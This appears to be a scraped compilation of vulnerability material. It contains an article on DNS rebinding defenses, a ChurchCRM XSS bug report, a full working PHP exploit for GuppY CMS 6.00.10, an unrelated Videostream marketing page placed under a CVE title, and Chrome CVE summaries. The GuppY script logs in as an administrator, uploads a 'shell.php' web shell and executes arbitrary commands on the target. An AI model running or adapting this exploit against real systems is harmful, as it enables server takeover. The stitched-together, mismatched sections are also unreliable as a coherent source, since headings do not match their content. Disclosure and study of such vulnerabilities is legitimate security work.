DNS rebinding attacks are not often seen in the wild, which is one reason why browser makers have taken a slower approach to adopting the web security standard.

Browser companies and network-security vendors have created a variety of defenses for the three-decades-old attack technique known as DNS rebinding, but protection remains spotty due to uneven acceptance and updated exploitation techniques.

DNS rebinding — which allows external malicious sites visited by an unsuspecting victim to access internal servers and services —is similar to cross-site request forgery, where an attacker can use a JavaScript component or Java applet to request resources from another site or network. DNS rebinding typically works by attracting a user to a malicious website and using the site's content and a short time-to-live (TTL) to force the browser to send a new domain name system (DNS) request, to which the attacker's site responds with an internal network IP address. The attack essentially allows an attacker to use a victim's browser to send requests to servers and devices on the internal network.

The attack, however, can be made harder to execute with a variety of defenses, including enforcing the Same-Origin Policy by pinning the domain name in the browser, looking for anomalous requests through the targeted user's DNS service, and adopting Local Network Access, a proposed Web security standard by the World Wide Web Consortium (W3C) that blocks DNS-based attacks. While these defenses work to make DNS rebinding attacks more difficult, they can be bypassed under some circumstances, NCC Group said in a recent report.

Because DNS rebinding exposes the attack surfaces of internal Web applications to malicious websites, the attack could be useful against enterprise targets as a way to gain access to credential data and resources hosted on internal networks, says Zhanhao Chen, a principal researcher for network security at Palo Alto Networks.

"In the real world, the attacker can build a website with a DNS rebinding script and trick the victim to open it in their browser," he says. "Once the malicious website is open on an employee's browser, the attacker can manipulate or steal information from internal Web applications that are vulnerable."

**DNS Rebinding Attacks Face Difficult Defenses**

Every browser does some form of DNS pinning, preventing the assigning of new network addresses for a specific website or host name for a certain time period, such as an hour. DNS-based security services, such as Cisco's Umbrella, also prevent anomalous changes in DNS data using suspicious response filters, which identify potential attacks and stop them.

The W3C's Local Network Access spec, previously called "Private Network Access," places a barriers between global, local, and internal addresses, such as the loopback address for the local host, and forces services to gain permission to explicitly access the local network.

In the latest analysis published by NCC Group, however, Roger Meyer, a technical director at NCC Group, argues that the defenses still are not complete. Using the 0.0.0.0 address, which can access Linux and Mac OS systems' internal IP address, for example, bypasses the current Local Network Access protections, Meyer says.

"Usually, that specific 0.0.0.0 IP address is non-routable and should not work as an IP address. You should not be able to even use it for accessing anything, but it just works on Mac OS and Linux devices," he says.

NCC Group opened up a bug report with Google, an early adopter of the Local Network Access specification, to get the issue fixed in the Chromium codebase, Meyer says.

**Bolstering Defenses**

DNS rebinding attacks are not often seen in the wild, which is one reason why browser makers have taken a slower approach to mitigating the issue. Another is that companies do not want to break internal applications, whose developers may rely on the ability to handle cross-origin requests.

If Web application developers adopt the HTTPS encrypted Web protocols as a general rule, they can prevent their applications from being used in a DNS rebinding attack, says Palo Alto Networks' Chen.

"This kind of mitigation depends on the developer of internal services, \[so\] it is not scalable," he says. "As third-party Web applications populate in both home and enterprise environments, it's more difficult for the network owners to identify and fix all potentially vulnerable servers."

While DNS rebinding is not as common as other widely spread threats, such as DNS tunneling, domain-generation algorithms, DNS amplification denial-of-service attacks, and DNS hijacking, many Web applications remain vulnerable to DNS rebinding, and attackers are actively exploiting it, Chen says. Palo Alto Networks noted that seven DNS-binding-related CVEs were released in 2021 and nine in 2022, and the company continues to see attack traffic in the wild.

Companies can help bolster their defenses by using DNS services that detect attacks and help remote employees protect their at-home environments. Because an attacker needs to either know information about the victim's environment or know they are using common devices or applications, those common services should be hardened against attack, NCC Group's Meyer says.

"There are ways to discover if there are vulnerable services on the network or on employee devices, so the company could scan the network to find those vulnerable services," he says. "There are intrusion detection systems or other kinds of security software that can look for services listening on developer machines or any other employees' systems, and any services that are listening on a localhost are potentially vulnerable to DNS rebinding."

Rebinding Attacks Persist With Spotty Browser Defenses

ChurchCRM v4.5.4 is vulnerable to Reflected Cross-Site Scripting (XSS) via image file.

**If you have the ChurchCRM software running, please file an issue using the _Report an issue_ in the help menu.**

**On what page in the application did you find this issue?**

I got issue CSVImport.php page.

**On what type of server is this running? Dedicated / Shared hosting? Linux / Windows?**

Windows Server

**What browser (and version) are you running?**

Brave browser \[Version 1.50.119 Chromium: 112.0.5615.121\]

**What version of PHP is the server running?**

7.4.29

**What version of SQL Server are you running?**

Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29

**What version of ChurchCRM are you running?**

v4.5.4

**Description:**  
I found Cross site scripting (XSS) vulnerability in your ChurchCRM (v4.5.4) "Admin" menu to CSV Import page there Import data CSV uploader option. When I upload image file there malicious code inserted in image then the browser give me result. Because a browser can not know if the script should be trusted or not.

**CMS Version:**  
v4.5.4

**Affected URL:**  
http://127.0.0.1/churchcrm/CSVImport.php

**Steps to Reproduce:**

1.  First login your admin panel.
2.  Then click "Admin" menu and click "CSV Import" and you will get CSV file uploder option.

3.  now insert xss payload in jpg file using exiftool or from image properties.

4.  after then upload the jpg file.
5.  you will see XSS pop up.

**Proof of Concept:**  
You can see the Proof of Concept. Which I've attached screenshots and video to confirm the vulnerability.

poc.mp4

**Impact:**  
Attackers can make use of this to conduct attacks like phishing, steal sessions etc.

Let me know if any further info is required.

Thanks & Regards  
**Rahad Chowdhury**  
Cyber Security Specialist  
https://www.linkedin.com/in/rahadchowdhury/

CVE-2023-31699: XSS via Image File · Issue #6471 · ChurchCRM/CRM

GuppY CMS 6.00.10 is vulnerable to Unrestricted File Upload which allows remote attackers to execute arbitrary code by uploading a php file.

**GuppY CMS v6.00.10 - Remote Code Execution**

**Platform:****PHP**

**Date:****2023-03-25**

  

    # Exploit Title: GuppY CMS v6.00.10 - Remote Code Execution
    # Date: Sep 30, 2022
    # Exploit Author: Chokri Hammedi
    # Vendor Homepage: https://www.freeguppy.org/
    # Software Link:
    https://www.freeguppy.org/fgy6dn.php?lng=en&pg=279927&tconfig=0#z2
    # Version: 6.00.10
    # Tested on: Linux
    
    #!/usr/bin/php
    
    <?php
    
    $username = "Admin2"; //Administrator username
    $password = "rose1337"; //Administrator password
    
    
    $options = getopt('u:c:');
    
    if(!isset($options['u'], $options['c']))
    die("\n GuppY 6.00.10 CMS Remote Code Execution \n Author: Chokri Hammedi
    \n \n Usage : php exploit.php -u http://target.org/ -c whoami\n\n
    
    \n");
    
    $target     =  $options['u'];
    
    $command    =  $options['c'];
    
    // Administrator login
    
    $cookie="cookie.txt";
    $url = "{$target}guppy/connect.php";
    
    $postdata = "connect=on&uuser=old&pseudo=".$username."&uid=".$password;
    $curlObj = curl_init();
    
    curl_setopt($curlObj, CURLOPT_URL, $url);
    curl_setopt($curlObj, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($curlObj, CURLOPT_HEADER, 1);
    curl_setopt($curlObj, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt ($curlObj, CURLOPT_POSTFIELDS, $postdata);
    curl_setopt ($curlObj, CURLOPT_POST, 1);
    CURL_setopt($curlObj,CURLOPT_RETURNTRANSFER,True);
    CURL_setopt($curlObj,CURLOPT_FOLLOWLOCATION,True);
    CURL_SETOPT($curlObj,CURLOPT_CONNECTTIMEOUT,30);
    CURL_SETOPT($curlObj,CURLOPT_TIMEOUT,30);
    curl_setopt($curlObj,CURLOPT_COOKIEFILE, "$cookie");
    curl_setopt($curlObj, CURLOPT_COOKIEJAR, "$cookie");
    $result = curl_exec($curlObj);
    
    
    // uploading shell
    
    $url2 = "{$target}guppy/admin/admin.php?lng=en&pg=upload";
    
    $post='------WebKitFormBoundarygA1APFcUlkIaWal4
    Content-Disposition: form-data; name="rep"
    
    file
    ------WebKitFormBoundarygA1APFcUlkIaWal4
    Content-Disposition: form-data; name="ficup"; filename="shell.php"
    Content-Type: application/x-php
    
    <?php system($_GET["cmd"]); ?>
    
    ------WebKitFormBoundarygA1APFcUlkIaWal4--
    ';
    
    $headers = array(
    
    
                'Content-Type: multipart/form-data;
    boundary=----WebKitFormBoundarygA1APFcUlkIaWal4',
                'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
    AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36',
    
                'Accept-Encoding: gzip, deflate',
                'Accept-Language: en-US,en;q=0.9'
    );
    curl_setopt($curlObj, CURLOPT_HTTPHEADER, $headers);
    curl_setopt($curlObj, CURLOPT_URL, $url2);
    curl_setopt($curlObj, CURLOPT_POSTFIELDS, $post);
    curl_setopt($curlObj, CURLOPT_POST, true);
    curl_setopt($curlObj, CURLOPT_SSL_VERIFYPEER, false);
    CURL_setopt($curlObj,CURLOPT_RETURNTRANSFER,True);
    CURL_setopt($curlObj,CURLOPT_FOLLOWLOCATION,True);
    CURL_SETOPT($curlObj,CURLOPT_CONNECTTIMEOUT,30);
    CURL_SETOPT($curlObj,CURLOPT_TIMEOUT,30);
    curl_setopt($curlObj,CURLOPT_COOKIEFILE, "$cookie");
    curl_setopt($curlObj, CURLOPT_COOKIEJAR, "$cookie");
    
    $data = curl_exec($curlObj);
    
    
    // Executing the shell
    
    
    $shell = "{$target}guppy/file/shell.php?cmd=" .$command;
    curl_setopt($curlObj, CURLOPT_URL, $shell);
    curl_setopt($curlObj, CURLOPT_HTTPHEADER, array('Content-Type:
    application/x-www-form-urlencoded'));
    curl_setopt($curlObj, CURLOPT_SSL_VERIFYPEER, False);
    CURL_setopt($curlObj,CURLOPT_RETURNTRANSFER,True);
    curl_setopt($curlObj, CURLOPT_HEADER, False);
    curl_setopt($curlObj, CURLOPT_POST, false);
    
    $exec_shell = curl_exec($curlObj);
    
    $code = curl_getinfo($curlObj, CURLINFO_HTTP_CODE);
    
    if($code != 200) {
        echo "\n\n \e[5m\033[31m[-]Something went wrong! \n [-]Please check the
    credentials\n";
    }
    else {
    
    print("\n");
    print($exec_shell);
    
    }
    curl_close($curlObj);
    
    ?>

CVE-2023-31903: OffSec’s Exploit Database Archive

The MoroSystems EasyMind - Mind Maps plugin before 2.15.0 for Confluence allows persistent XSS when saving a Mind Map with the hyperlink parameter.

CVE-2023-30452: EasyMind - Mind Maps for Confluence - Version history

Videostream macOS app 0.5.0 and 0.4.3 has a Race Condition. The Updater privileged script attempts to update Videostream every 5 hours.

**Downloaded videos on your Chromecast. Instantly.****The easiest way to stream

videos MP4s MKVs AVIs WMVs MP3s

from your computer to Chromecast or AndroidTV.  
Control it all from Android or iOS.**

  

Brooklyn Nine Nine © 2013-2015 Fremulon, Dr. Goor Productions (PG)

play\_arrow

No setup. Seriously.  
**Just start watching.**

event\_seat

**Relax with Mobile Apps**

Play, pause, & seek from your couch with **free** Android and iOS remotes.

**Play MKVs, AVIs, MP4s, MP3s...**

Videostream supports over 400 video and audio codecs out of the box.  
This means you can **play almost any video on your Chromecast!**

**...with no setup**

There's no pesky library setup or servers to install.  
There's no accounts to create or codecs to download.  
**Just choose a video and ...no really, that's it!**  
Start watching any video on your Chromecast in seconds, Install the Desktop App now!

Frozen © 2013 Walt Disney Animation Studios (G)

Suits © 2011-2015 Universal Cable (TV-14)

**Playlists, Subtitles, & Rainbows,  
Premium is Awesome.**

done

**Playlists:** Binge watch your favourite shows using playlists in Chrome

done

**Subtitles:** Get extra settings to change subtitle size and color

done

**Notifications:** Notifications on Android when your downloads finish

done

**Love:** Support (and feed!) our team of 7 developers in Canada! <3

**Start watching downloads on your Chromecast!**

**"It's the perfect app to stream your media to your Chromecasts"**

"No fiddling about with extra services, just find the file you want and have it play in the big screen." - Gizmodo

**It transformed my Chromecast from a Netflix and YouTube machine to a watch-whatever-I-want-machine. Which is great!**

\- Shonda, Videostream User

**Let me start by saying that I recently bought the lifetime premium membership and I absolutely love Videostream. It is my favorite thing in the world after pizza and Coca-Cola.**

\- Aldo, Videostream Premium User

**I have a very large movie collection on a networked drive, and it never fails to load the movies, cast them, load subtitles, etc. It's a piece of technology and media genius, so thank you all.**

\- Eliza, Videostream User

**I just wanted to say how much I love Videostream. I use it almost every day. Now that I can select files right from my phone, it is a completely hassle free experience.**

\- Rezaan, Videostream User

**People love Videostream. Try it yourself for free!  
**

**7 developers in Canada eh!?**

Just bunch of Canucks coding for the love of perfect streaming video <3

**Frequently Asked Questions**

Got questions? We have answers (if your answer isn't below, email us!)

**Do you play \_\_\_ files? (MKV, MP4, AVI, WMV...)**

Yup!! Videostream supports over 400 audio and video codecs so with almost complete certainty, yes.

**How much does it cost?**

Nothing, zip, zilch, nada, Videostream is completely free! If you're enjoying Videostream and want some extra features like playlists, extra subtitle settings, night mode, autoplay, and more, then Videostream Premium is for you!

**I have slow internet, will Videostream work?**

You bet! Since you are streaming video from your computer directly to your Chromecast or AndroidTV, Videostream doesn't use any of your internet bandwidth! That means no extra usage on your bill, no slowed down traffic on other devices.

**How do I setup Videostream?**

It's super simple! Open Google Chrome and then install Videostream. If you have an iPhone or Android phone you can check out our remote controls on those apps stores too!

**Does Videostream have playlists?!**

Is maple syrup sweet?! You bet! Playlists let you binge watch movies, tv shows, and even listen to music on your Chromecast. You can even shuffle or repeat your playlist! Grab your playlists in Videostream Premium, download and upgrade in the Desktop or Android App today!

**What if I have another question?**

Email us at \[email protected\]! Our awesome support bro Andrew will be sure to email you back with answers to your questions, solutions to your problems, and a random selection of cat pictures and gifs!

**Come on, it's what you bought your Chromecast for!**

CVE-2023-25394: What you bought your Chromecast for.

Use after free in DevTools in Google Chrome prior to 113.0.5672.126 allowed a remote attacker who had compromised the renderer process to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)

CVE-2023-2723

Inappropriate implementation in WebApp Installs in Google Chrome prior to 113.0.5672.126 allowed an attacker who convinced a user to install a malicious web app to bypass install dialog via a crafted HTML page. (Chromium security severity: Medium)

CVE-2023-2726

Type confusion in V8 in Google Chrome prior to 113.0.5672.126 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)

CVE-2023-2724

Use after free in Autofill UI in Google Chrome on Android prior to 113.0.5672.126 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)

CVE-2023-2722

Use after free in Navigation in Google Chrome prior to 113.0.5672.126 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Critical)

**Chrome Releases**

Release updates from the Chrome team

Tag

#chrome